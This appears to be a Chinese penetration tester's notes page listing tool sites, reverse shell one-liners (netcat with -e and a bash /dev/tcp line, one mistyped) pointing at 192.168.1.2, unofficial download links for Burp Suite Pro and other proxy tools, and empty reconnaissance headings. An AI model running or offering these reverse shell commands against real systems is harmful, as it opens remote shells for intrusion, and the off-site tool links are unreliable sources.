常用工具/网站

常用语参考:https://www.cnblogs.com/sunny11/p/13583083.html

操作系统命令:https://wangchujiang.com/linux-command/

常用反弹shell命令:https://forum.ywhack.com/shell.php

1
2
3
4
nc -lvvp 2333(监听)
nc -e cmd 192.168.1.2 2333
nc -e /bin/bash 192.168.1.2 2333
bash -i &> /dev/tcp/192.168.1.2/2333 0&>1

抓包工具:

Burp Suite:http://ixxzhi.cn/d/tools/burpsuite_pro_v2023.3.zip?sign=O2iSiRMnL7t9Au2KoPBtNnvAjTcA_MCmOjwHpq5kHNY=:0

Charlies:http://ixxzhi.cn/d/tools/charles-proxy-4.6.3-win64.msi?sign=Y6c342qd0Vga3augKrJE3FdhuEHgd7G-96ICYaPK9KQ=:0

Fiddler:http://ixxzhi.cn/d/tools/Fiddler5%E6%B1%89%E5%8C%96%E4%B8%AD%E6%96%87%E7%89%88.zip?sign=11jZMJln-IUY-ihVxFv8zJ2B0zc62qqrtXXDCpbE5wI=:0

Proxifier:http://ixxzhi.cn/d/tools/Proxifier.zip?sign=PTOnT00ZbPc60_OTqzsXdzxeUUFkJ16O0FsuUNUGfHU=:0

信息收集:

综合

子域收集

目录扫描

CMS识别

  • whatweb

端口扫描

浏览器插件